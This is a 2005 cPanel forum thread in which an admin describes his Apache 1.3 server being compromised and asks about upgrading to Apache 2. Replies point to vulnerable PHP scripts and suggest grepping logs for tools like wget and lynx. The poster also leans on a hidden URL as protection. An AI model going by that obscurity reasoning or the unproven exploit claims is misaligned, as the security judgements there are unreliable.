The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

apache / easyapache / buildapache2

Discussion in 'EasyApache' started by afraser, Jan 7, 2005.

  1. afraser

    afraser Member

    Joined:
    Jan 7, 2005
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
    Guys,

    I'm getting SLAMMED by some stinker who's exploiting my 1.3.3 installation. I was able to fairly easily upgrade my PHP install, and I even became bold enough to click the radio button that says "Apache 2 Support (Experimental & Very Broken, Not for Production Use)"

    Man, it worked perfectly from an install perspective. Just like I had done it myself a thousand times, all the sudden there was a capable install in /usr/local/apache2.

    Problem was, it had nothing to do with cpanel or any of that. My "restart" apache WHM button was pointing to /usr/local/apache/bin/, my rc2.d files were unchanged, and of course, my /usr/local/apache2/conf/httpd.conf file was straight out of the box. {No entries for any of my domains or any of that.}

    I noticed a few buildapache files up there with that magic number 2 next to them on:
    http://layer1.cpanel.net/

    Can I just edit my easyapache script to point to something else and tie it all together? Is this in release yet, anywhere? To my defenseless apache server, it's sort of important.


    BTW, I tried to report the exploit to security@apache.org and they laughed me out of the web. Told me to go upgrade and learn unix basically. Can't say I disagree with him. I haven't used 1.3.x in several years, before this install that is.



    tony fraser
    http://www.dakotaplanet.com
     
  2. bking

    bking Well-Known Member

    Joined:
    Mar 1, 2004
    Messages:
    206
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Sydney
    Do you mind telling us what exploit it is/was? :)
     
  3. afraser

    afraser Member

    Joined:
    Jan 7, 2005
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
  4. haze

    haze Well-Known Member

    Joined:
    Dec 21, 2001
    Messages:
    1,550
    Likes Received:
    3
    Trophy Points:
    38
    1. I'd stick with 1.3.33 rather than go up to 2, its VERY broken.
    2. You were probably attacked via a vulnerable php script. You might want to do an audit on any php scripts installed by yourself or clients. You really should hire someone if you don't feel capable enough managing your server. There are many steps you can take to help prevent this sort of thing from happening. I mean who knows whats installed on the server right now that you don't know about.
     
  5. philb

    philb Well-Known Member

    Joined:
    Jan 28, 2004
    Messages:
    116
    Likes Received:
    0
    Trophy Points:
    16
    This is correct. You are extremely unlikely to be actually suffering apache exploits. I'd check your server for out of date phpBB (and phpnuke) installations as this is much more likely to be the source of the exploits.

    Specifically the problem lies with viewtopic.php files in phpBB installations predating 18/11/2004.
     
  6. afraser

    afraser Member

    Joined:
    Jan 7, 2005
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
    Apache 2 itself is most definitely not very broken. I hope you guys who say that are talking about the way CPanel rolls it out, not the web server itself. [Not just you, but even that little cpanel deal that makes apache2 look like beta software.]

    I'm going to be a little humble here and agree with you on your point about hiring somebody. I really don't know how to get cpanel to upgrade apache to apahce 2. Though it would sound crazy, if I'd not have tried cpanel and just continued to work servers by hand, I would have long since recompiled apache, patched it, and pushed it out again already. Part of me is kicking myself, but a bigger part of me likes to not have to spend time doing those sorts of things anymore.


    The viewtopic.php worm it's altogether different. I am not at risk for that. It's not a nuke exploit, I don't even have it installed.


    Yes, I've combed through my entire file system, looked for modified or swapped files, etc. The only files in my filesystem that did not belong were those listed in that other post. I've also combed through every entry in all web logs, by hand. [Yes, I've been staring at this for five days straight now] There's simply nothing unusual in terms of posting ot php like you'd expect for a standard buffer overload php exploit.


    It's not like my software's not up to date with cpanel or that I haven't done all my upgrades. Given the way it happened, it just looks like a good old fashioned apache exploit regardless of the specifics of how it was execuited. There really aren't many things that you can do here other than search bugzilla, check for patch upgrades, and make sure you're apache's more recent than the one the guy just cracked.

    Given it was a hijacked thread in the first place (as implied in my other post), you can't blame a guy for wanting to get apache into the a different theading model.


    tony fraser
     
    #6 afraser, Jan 8, 2005
    Last edited: Jan 8, 2005
  7. haze

    haze Well-Known Member

    Joined:
    Dec 21, 2001
    Messages:
    1,550
    Likes Received:
    3
    Trophy Points:
    38
    I should have been a little more clear. What I meant is that cpanel and apache2 don't get along very well together. I've nothing against apache's httpd2 its a very nice piece of arse :)

    To be honest it doesn't have the markings of the phpBB exploit ( unless its a varient i haven't seen ). I have however seen this sort of thing happen over and over again with clients machines that im left to pick the pieces up for. The fact that the files are owned by nobody is the first sign its been uploaded or crafted by apache. Second, if your not using phpsuexec on this machine then all php files will have the ownership of nobody. If it was a perl script that uploaded the file ( assuming you have suexec on.. which we all should really ) the file would be owned by that user. Either way, apache can't install a file on its own. There needs to be another entry point there, thats where the php script comes into play. Its usually a 3rd party script, or a script you might have written and given out with source.

    I'm not sure how long ago this happened but you may want to grep your apache domlogs ( in /usr/local/apache/domlogs/domain.com or * for wildcard with few sites ) for things such as the filenames of the files you found as well as tools such as wget, lynx, etc. Though depending on your setup those logs may long be gone.
     
  8. philb

    philb Well-Known Member

    Joined:
    Jan 28, 2004
    Messages:
    116
    Likes Received:
    0
    Trophy Points:
    16
    Unless you're running something like slashdot, the people who are actually any good at breaking into systems won't waste their 0-day exploits on you.

    If it was an apache hole, it would almost certainly be all over secfocus/bugtraq by now and/or hundreds of people would be getting hit.
     
  9. afraser

    afraser Member

    Joined:
    Jan 7, 2005
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
    Thank you so much Haze. That was the sort of answer I was hoping to hear from this board. There does have to be an entry point, and it is through the front end.

    Nearly all the code on this server, except of course cpanel itself, was written by me. Apache DOES upload files to my server, that's sort of the basis of most of the clients I work with, dynamic uploadable and configurable content, everything from movies to client data all through POST variables, all custom. And of course, if it's not the right mime type, it's discarded and an error is sent back to the client that the upload failed.

    On the other hand, you have to be authenticated to even see a submit button, and you have to physically type in a hidden URL to get to that login screen anyway. It can't really get any more obscure than that.

    Other than a 'post' comment on my phpgallery page, and login/password screens for all my clients, there's really no other post buttons on my server to unauthenticated users. And, I did go check all the 'post' requests around the time of break in. There wasn't even anything posted around then.

    There's no perl CGI scripts anywhere, nor are there any ASP pages anywhere. (ASP sucks) I do have a BB on the system, but it's not linked anywhere nor has it ever even been viewed by the outside world, except for me when I installed it. But of course, I did apply the patch immediatly like any good admin would.


    I just don't think it's a POST trojan...
    Maybe a GET on gallery??
    What do you think?


    I didn't see anything unusual on GETs either.




    tony fraser
     
Loading...

Share This Page